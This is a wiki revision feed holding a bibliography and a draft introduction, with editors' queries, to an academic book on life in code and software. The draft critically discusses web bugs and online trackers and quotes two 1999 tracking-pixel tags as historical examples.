Davidson, C. (2012) Why We Need a 4th R: Reading, wRiting, aRithmetic, algoRithms, DML Central, accessed 15/03/2012, http://dmlcentral.net/blog/cathy-davidson/why-we-need-4th-r-reading-writing-arithmetic-algorithms ''(c) 2012 C. Davidson, Creative Commons Attribution 3.0 License '' &lt;br /&gt;
&lt;br /&gt;
Deleuze, G. (1992) Postscript on the Societies of Control, ''October'', vol. 59, pp 3-7, accessed 15/03/2012, http://www.n5m.org/n5m2/media/texts/deleuze.htm ''(c) 1992 October/MIT Press'' &lt;br /&gt;
&lt;br /&gt;
Dijkstra, E. W. (1998) On the cruelty of really teaching computing science, accessed 15/03/2012, http://virtual.itca.edu.sv/dokeos/sinapsis/cd/doctos-sw-libre/docus-ewd/EWD1036%20-%20On%20the%20cruelty%20of%20really%20teaching%20computing%20scienc.pdf ''(c) 1998 Dijkstra, E. W.'' &lt;br /&gt;
&lt;br /&gt;
Gardner, M. (1970) The fantastic combinations of John Conway's new solitaire game &amp;quot;life&amp;quot;, Scientific American, 223 (October 1970): 120-123, accessed 15/03/2012, http://www.ibiblio.org/lifepatterns/october1970.html&lt;br /&gt;
''(c) 1970 Scientific American''&lt;br /&gt;
&lt;br /&gt;
Guattari, F. (1989) The Three Ecologies, new formations, no. 8, accessed 15/03/2012, http://www.amielandmelburn.org.uk/collections/newformations/08_131.pdf ''(c) New Formations'' &lt;br /&gt;
&lt;br /&gt;
Fogg, B. J., Cuellar, G., and Danielson, D. (2003) Motivating, Influencing, and Persuading Users, In Jacko, J. and Sears A. (eds.), The human-computer interaction handbook: fundamentals, evolving technologies, and emerging applications, accessed 15/03/2012, http://bjfogg.com/hci.pdf ''(c) 2003 Laurence Erbaum Associates'' &lt;br /&gt;
&lt;br /&gt;
Fuller, M. and Matos, S. (2011) Feral Computing: From Ubiquitous Calculation to Wild Interactions, ''Fibreculture'', issue 19, accessed 15/03/2012, http://nineteen.fibreculturejournal.org/fcj-135-feral-computing-from-ubiquitous-calculation-to-wild-interactions/ ''Creative Commons Attribution-NonCommercial-NoDerivs 2.5 Australia (CC BY-NC-ND 2.5)'' &lt;br /&gt;
&lt;br /&gt;
Frabetti, F. (2010) Critical Code Studies, accessed 15/03/2012, http://vimeo.com/16263212 ''(c) 2010 F. Frabetti'' &lt;br /&gt;
&lt;br /&gt;
Goetz, T. (2011) Harnessing the Power of Feedback Loops, Wired, accessed 12/09/2011, http://www.wired.com/magazine/2011/06/ff_feedbackloop/ ''(c) 2011 Wired'' &lt;br /&gt;
&lt;br /&gt;
Jerz, D. G. (2007) Somewhere Nearby is Colossal Cave: Examining Will Crowther's Original &amp;quot;Adventure&amp;quot; in Code and in Kentucky, Digital Humanities Quarterly, Volume 1 Number 2, accessed 15/03/2012, http://www.digitalhumanities.org/dhq/vol/001/2/000009/000009.html ''This work is licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 License'' &lt;br /&gt;
&lt;br /&gt;
Kitchin, R. (2012) The Programmable City, Environment and Planning B: Planning and Design, volume 38, pages 945-951, accessed 15/03/2012, http://www.envplan.com/epb/editorials/b3806com.pdf ''Copyright © 2012 a Pion publication, Environment and Planning B: Planning and Design'' &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) Ralph Langner: Cracking Stuxnet, a 21st-century cyber weapon, accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ ''© TED CONFERENCES, LLC'' &lt;br /&gt;
&lt;br /&gt;
Latour, B. (2012) The Whole is Always Smaller Than Its Parts - A Digital Test of Gabriel Tarde’s Monads, ''British Journal of Sociology'', accessed 15/03/2012, http://www.bruno-latour.fr/sites/default/files/123-WHOLE-PART-FINAL.pdf&lt;br /&gt;
''(c) 2012 Bruno Latour/British Journal of Sociology''&lt;br /&gt;
&lt;br /&gt;
MacKenzie, A. (2006) “The Problem of Computer Code: Leviathan or Common Power?” Institute for Cultural Research, Lancaster University. 10 August 2006, accessed 15/03/2012, http://www.lancs.ac.uk/staff/mackenza/papers/code-leviathan.pdf ''(c) 2006 Adrian MacKenzie'' &lt;br /&gt;
&lt;br /&gt;
MacKenzie, A. (2008) Wirelessness as Experience of Transition, Fibreculture, 13, accessed 15/03/2012, http://thirteen.fibreculturejournal.org/fcj-085-wirelessness-as-experience-of-transition/ ''Creative Commons Attribution-NonCommercial-NoDerivs 2.5 Australia (CC BY-NC-ND 2.5)'' &lt;br /&gt;
&lt;br /&gt;
Manovich, L. (2008) Software Takes Command, accessed 15/03/2012, http://lab.softwarestudies.com/2008/11/softbook.html ''Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 Unported License'' &lt;br /&gt;
&lt;br /&gt;
Marino, Mark C. “Critical Code Studies” Electronic Book Review. 2006. Available at http://www.electronicbookreview.com/thread/electropoetics/codology ''Creative Commons: Attribution-NonCommercial-ShareAlike 2.5 Generic (CC BY-NC-SA 2.5)'' &lt;br /&gt;
&lt;br /&gt;
McCallum, L., and Smith, D. (2012) Show Us Your Screens, accessed 04/03/2012, http://vimeo.com/20241649 ''(c) McCallum, L., and Smith, D.'' &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) Stuxnet Under the Microscope, accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf ''© 2012 ESET North America. All rights reserved. Trademarks used herein are trademarks or registered trademarks of ESET spol. s r.o. or ESET North America. Freely Available White Papers'' &lt;br /&gt;
&lt;br /&gt;
Parikka, J. (2011) Media Ecologies and Imaginary Media: Transversal Expansions, Contractions, and Foldings, Fibreculture, issue 19, accessed 15/03/2012, http://seventeen.fibreculturejournal.org/fcj-116-media-ecologies-and-imaginary-media-transversal-expansions-contractions-and-foldings/ ''Creative Commons Attribution-NonCommercial-NoDerivs 2.5 Australia (CC BY-NC-ND 2.5)'' &lt;br /&gt;
&lt;br /&gt;
Parisi, L. and Portanova, S. (2012) Soft Thought (in architecture and choreography), Computational Culture, issue 1, accessed 16/03/2012, http://computationalculture.net/article/soft-thought ''(c) 2012 Copyright the Authors, Computational Culture is an online open-access peer-reviewed journal'' &lt;br /&gt;
&lt;br /&gt;
Ramsay, S. (2010) Algorithms are Thoughts, Chainsaws are Tools, accessed 04/03/2012, http://vimeo.com/9790850 ''(c) Stephan Ramsay'' &lt;br /&gt;
&lt;br /&gt;
Ramsay, S. (2011) On Building, accessed 15/03/2012, http://lenz.unl.edu/papers/2011/01/11/on-building.html ''(c) Stephan Ramsay'' &lt;br /&gt;
&lt;br /&gt;
Slavin, K. (2010) How algorithms shape our world, TEDGlobal accessed 15/03/2012,http://www.ted.com/talks/kevin_slavin_how_algorithms_shape_our_world.html ''© TED CONFERENCES, LLC'' &lt;br /&gt;
&lt;br /&gt;
Turing, A.M. (1936). &amp;quot;On Computable Numbers, with an Application to the Entscheidungs problem&amp;quot;. Proceedings of the London Mathematical Society. 2 42: 230–65, accessed 15/03/2012, http://www.cs.virginia.edu/~robins/Turing_Paper_1936.pdf ''(c) 1937 London Mathematical Society'' &lt;br /&gt;
&lt;br /&gt;
Turing, A.M. (1950). Computing machinery and intelligence. Mind, 59, 433-460. ''(c) 1950 Mind'' &lt;br /&gt;
&lt;br /&gt;
Weisstein, Eric W. &amp;quot;Turing Machine.&amp;quot; From MathWorld--A Wolfram Web Resource, accessed 15/03/2012, http://mathworld.wolfram.com/TuringMachine.html ''© 1999-2012 Wolfram Research, Inc.'' &lt;br /&gt;
&lt;br /&gt;
Wing, J. M. (2006) Computational Thinking, Proceedings of the ACM, accessed 15/03/2012, http://www.cs.cmu.edu/afs/cs/usr/wing/www/publications/Wing06.pdf ''(c) Jeannette Wing'' &lt;br /&gt;
&lt;br /&gt;
Wing, J. M. (2009) Computational Thinking and Thinking About Computing, accessed 15/03/2012, http://www.youtube.com/watch?v=C2Pq4N-iE4I ''(c) Jeannette Wing, standard Youtube license'' &lt;br /&gt;
&lt;br /&gt;
Wolf, G. (2010) The Quantified Self, TED, accessed 15/03/2012, http://www.youtube.com/watch?v=OrAo8oBBFIo ''(c) 2010 TED CONFERENCES, LLC''&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4711</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4711"/>
		<updated>2012-04-18T14:42:43Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology that we inhabit. As such we need to take account of this new computational envornment and think about how today we live in a highly mediated, code-based world. [Eds: Is there a slippage here from a situation where code and software are 'important', to one in which they form the actual basis of our world, constituting the possibility of human life? Does something need to be said here about the extent to which code and software can be privileged in this respect? For example, why can they be said to constitute the conditions for human living over and above any of the other possible candidates for this role: air, the economy, evolution, the environment, satellites and so on?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which it also remains within the purview of humans to seek to understand. As Kitchin argues:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet. (Kitchin, 2011: 945)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has inevitably [Eds: is its penetration really 'inevitable'?] penetrated more and more into the lifeworld. This has created, and continues to create, specific tensions in relation to old media forms [Eds: should an example be provided of such a tension?], as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. This is something that relates to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary kernel within the softwarization project. This [Eds: this is the fourth sentence in this paragraph to begin with 'This'] is a result of the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate. Indeed, as Deuze ''et al ''have argued:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world. (Deuze, Blank, and Speers, 2012)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is. [Eds: should some examples of such statistics be provided?] These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers it. &lt;br /&gt;
&lt;br /&gt;
They [Eds: what does this 'they' refer to? Can it be clarified?] also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life is simply breathtaking [Eds: is this not repeating the 'breathtaking' claim of the previous paragraph?], if we had not already discounted and backgrounded its importance. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane. &lt;br /&gt;
&lt;br /&gt;
Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences [Eds: Above the claim was made that code/software are the conditions of possibility of human life. How, then, can they mediate between us and our experiences if they are what makes 'us' possible? Do they constitute us and our world; do they mediate between us and the world; or do they do both? Does all this need clarifying?], disconnecting the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system. Called ‘fly-by-wire’ in aircraft design, in reality fly-by-wire is the condition of the computational environment we increasingly experience, and I elsewhere term ''computationality'' (Berry, 2011). This is a highly mediated existence and has been a growing feature of the (post) modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacra lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. [Eds: less material than what? Does this need to be explained?] This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind glass rectangular squares which yield only to certain prescribed forms of touch-based interfaces. Here I am thinking both of physical keyboards and trackpads, as much as haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep. [Eds: At least one of those contained in your book here, F. Frabetti, creates problems for this idea of Hayles' and its too simplistic understanding of code, print, and materiality. Is this something that should be referenced and commented upon?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomena of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence. (Madrigal, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Web bugs are automated data collection agents that are secretly included in the web pages that we browse. Often held within a tiny one-pixel frame or image, which is therefore far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behavior, but also [Eds: use 'and' instead of 'but also' as these acts are not that different?] send various information about the user back to their servers. &lt;br /&gt;
&lt;br /&gt;
Originally designed as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were designed to enable webpages and sites to store the current collection of data about a user, or what is called ‘State’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour, and collect data and information about users raises important privacy implications, but it also facilitates the rise of so-called behaviour marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245). &lt;br /&gt;
&lt;br /&gt;
Fortunately, we are seeing the creation of a number of useful software projects to allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery log for the [http://chartbeat.com/ ChartBeat company] it is described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs. (Ghostery, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code run in the browser without the knowledge of the user, which if it should be observed, looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999): &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;(http://ad.doubleclick.net/ad/pixel.quicken/NEW)&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;(http://media.preferences.com/ping?&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any) &amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;group=register&amp;amp;amp; time=1999.10.27.20.5 6.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique to reduce the readability of the code in order to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again Ghostery (2012b) usefully supplies us with some general information on the web bug, such as the fact that it has been found on over 100,000 websites across the Internet, and that the data collected is 'anonymous (browser type), pseudonymous (IP address)', the data is not shared with third parties but no information is given on their data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behavior, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users desire &amp;quot;not to be tracked.&amp;quot;' (Madrigal, 2012). [Eds: please check that the single and double quotation marks here are correct]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second guess, tempt, direct and nudge behavior in particular directions. Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery, 2011). As can be seen in terms of relative size of encounter, Google is clearly the biggest player by a long distance in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor to each website at [http://www.businessinsider.com/blackboard/amazon Amazon] (e-commerce) is generating $189 per user, at [http://www.businessinsider.com/blackboard/google Google] (search) it is generating $24 per user, and although Facebook (social networking) is only generating $4 per user, this is a rapidly growing number (Yarrow, 2011).&amp;amp;nbsp; Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc. is increasingly becomong extremely profitable. Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into five main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [http://www.att.com/ AT&amp;amp;amp;T] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Exchange: A provider of marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [http://www.rightmedia.com/ Right Media]&amp;amp;nbsp; &amp;amp;nbsp; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Network: A broker and often technology provider connecting advertisers and publishers. (web site operators) Example: [http://www.burstmedia.com/ Burst Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Publisher: Website operator who displays ads for advertiser(s) in various types of campaigns. Example: [http://www.nytimes.com/ The New York Times]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
2. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Analysis/Research Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [http://www.bluekai.com/ BlueKai] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. [http://www.experian.com/ Experian] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [http://www.roilabs.com/ ROILabs] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Research: Collects data for market research purposes where no ads are serviced through this data. Example: Example: [http://www.safecount.net/ Safecount] &lt;br /&gt;
*e.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [http://www.google.com/analytics/ Google Analytics] &lt;br /&gt;
*f.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Retargeter: Providers of technologies that allow publishers to identify their visitor when they place ads on third party sites. Example: [http://www.fetchback.com/ Fetchback]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
3. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [http://www.invitemedia.com/ Invite Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges.&amp;amp;nbsp; SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [http://www.admeld.com/ AdMeld]&amp;lt;br&amp;gt; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [http://www.doubleclick.com/ DoubleClick DART]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [http://www.mediacom.com/en/home.aspx MediaCom]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
4. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. &amp;amp;nbsp;Example: [http://www.clickforensics.com/ ClickForensics] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [http://www.betteradvertising.com/ Better Advertising]&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma, 2010)]] &amp;lt;br&amp;gt; ''Image 1: Display Advertising Technology Landscape (Luma, 2010)''&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A company like [http://www.turn.com/ Turn Media] is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [http://www.bluekai.com/ BlueKai], [http://www.targusinfo.com/ TargusInfo], [http://www.exelate.com/new/index.html eXelate], and others (Ghostery, 2010). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Of course, one element missing from this typology is that of surveillance, and indeed it is no surprise that web bugs perform part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [http://readnotify.com/ readnotify.com] to trace insider leaks to the journalist Dawn Kawamoto and later confirmed in testimony to a U.S. House of Representatives subcommittee that it's ‘still company practice to use e-mail bugs in certain cases’ (Evers, 2006; Fried, 2006). &lt;br /&gt;
&lt;br /&gt;
